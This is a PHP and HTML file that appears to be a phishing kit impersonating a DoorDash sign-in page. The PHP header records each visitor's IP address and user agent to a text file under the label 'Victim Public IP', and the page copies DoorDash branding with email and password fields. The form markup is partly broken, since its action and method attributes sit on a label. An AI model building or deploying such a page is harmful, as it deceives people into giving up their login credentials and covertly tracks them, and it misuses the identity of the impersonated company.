<?php
if (!empty($_SERVER['HTTP_CLIENT_IP']))   //check ip from share internet
    {
      $ipaddress = $_SERVER['HTTP_CLIENT_IP']."\r\n";
    }
elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))   //to check if ip is pass from proxy
    {
      $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR']."\r\n";
    }
else
    {
      $ipaddress = $_SERVER['REMOTE_ADDR']."\r\n";
    }
$useragent = " User-Agent: ";
$browser = $_SERVER['HTTP_USER_AGENT'];


$file = 'ip.txt';  //this is the file to which the IP address will be written; name it your way.
$victim = "Victim Public IP: ";
$fp = fopen($file, 'a');

fwrite($fp, $victim);
fwrite($fp, $ipaddress);
fwrite($fp, $useragent);
fwrite($fp, $browser);


fclose($fp);
?>
<!DOCTYPE html>
<html lang="en" >

<head>
  <meta charset="UTF-8">
  <title>DoorDash </title>
  
  
  
      <link rel="stylesheet" href="css/style.css">

  
</head>

<body>

  <div id="wrapper">
      <div id="left">
        <div id="signin">
          <div style="position: fixed; left: 0px; right: 0px; top: 0px; bottom: 630px; background-color: white;">
            <img style="width: 300px; position: fixed; top: 15px; left: 360px;" src="https://static1.squarespace.com/static/5a8cb367a9db09b9def90c2f/t/5a8dffd3652dea39628ce348/1551420115313/" alt="DoorDash" />
          </div>
          <form>
            <div>
              <label>Email or username</label>
              <input type="text" class="text-input" />
            </div>
            <div>
              <label class="_3jvtb" action="login.php" method="POST">
              <input type="password" class="text-input" />
            </div>
            <button type="submit" class="primary-btn">Sign In</button>
          </form>
          <div class="links">
            <a href="#">Forgot Password</a>
            <a href="#">Sign in with company or school</a>
          </div>
          <div class="or">
            <hr class="bar" />
            <span>OR</span>
            <hr class="bar" />
          </div>
          <a href="#" class="secondary-btn">Create an account</a>
        </div>
        <footer id="main-footer">
          <p>Copyright &copy; 2018, Sluralpright All Rights Reserved</p>
          <div>
            <a href="#">terms of use</a> | <a href="#">Privacy Policy</a>
          </div>
        </footer>
      </div>
      <div id="right">
        <div id="showcase">
          <div class="showcase-content">
            <h1 class="showcase-text">
              Get food delivered, without leaving the couch!
            </h1>
            <a href="#" class="secondary-btn">Start a FREE 10-day trial</a>
          </div>
        </div>
      </div>
    </div>
  
  

</body>

</html>
